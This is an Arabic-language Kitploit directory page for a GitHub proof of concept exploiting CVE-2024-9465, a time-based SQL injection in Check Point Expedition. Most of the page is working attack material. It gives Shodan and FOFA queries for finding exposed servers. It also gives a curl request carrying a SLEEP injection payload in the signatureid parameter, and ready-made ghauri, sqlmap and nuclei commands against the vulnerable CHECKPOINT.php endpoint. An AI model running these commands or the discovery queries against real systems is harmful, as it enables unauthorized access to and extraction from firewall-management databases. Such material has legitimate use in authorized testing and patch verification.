Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9465 — إثبات مفهوم لاستغلال CVE-2024-9465، وهو حقن SQL قائم على الوقت في Check Point Expedition، مع استعلامات بحث Shodan/FOFA وتكامل مع sqlmap وghauri وnuclei. | Kitploit
أدوات/GitHubGitHub/mustafaakalin/cve-2024-9465
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmustafaakalin/cve-2024-9465

CVE-2024-9465

إثبات مفهوم لاستغلال CVE-2024-9465، وهو حقن SQL قائم على الوقت في Check Point Expedition، مع استعلامات بحث Shodan/FOFA وتكامل مع sqlmap وghauri وnuclei.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9465

حقن SQL في Checkpoint عبر هجوم قائم على الوقت (CVE-2024-9465)

بحث SHODAN

root@kitploit:~
https://www.shodan.io/search?query=html%3A%22Expedition+Project%22

html:"Expedition Project"

بحث FOFA

root@kitploit:~
https://en.fofa.info/
body="Expedition Project" || title="Expedition Project"

الاستخدام

root@kitploit:~
python3 CVE-2024-9465.py -u https://domain.com

أمر cURL

root@kitploit:~
curl -X POST "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=import&type=test&project=pandbRBAC&signatureid=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(10)))horizon3)" \
-w "Total Time: %{time_total}\n" \
-k

أمر Ghauri

root@kitploit:~
ghauri --url "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--technique T \
--dbms mysql \
--time-sec 10 \
-p signatureid \
--threads 10 

أمر SQLMAP

root@kitploit:~
sqlmap -u "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--dbms=mysql \
--level 5 --risk 3 \
--time-sec=10 \
--technique=T \
--tamper=space2comment \
--batch --random-agent -v 3

أمر Nuclei

root@kitploit:~
nuclei -u https://domain.com -t CVE-2024-9465.yaml -v
تنزيل الأداة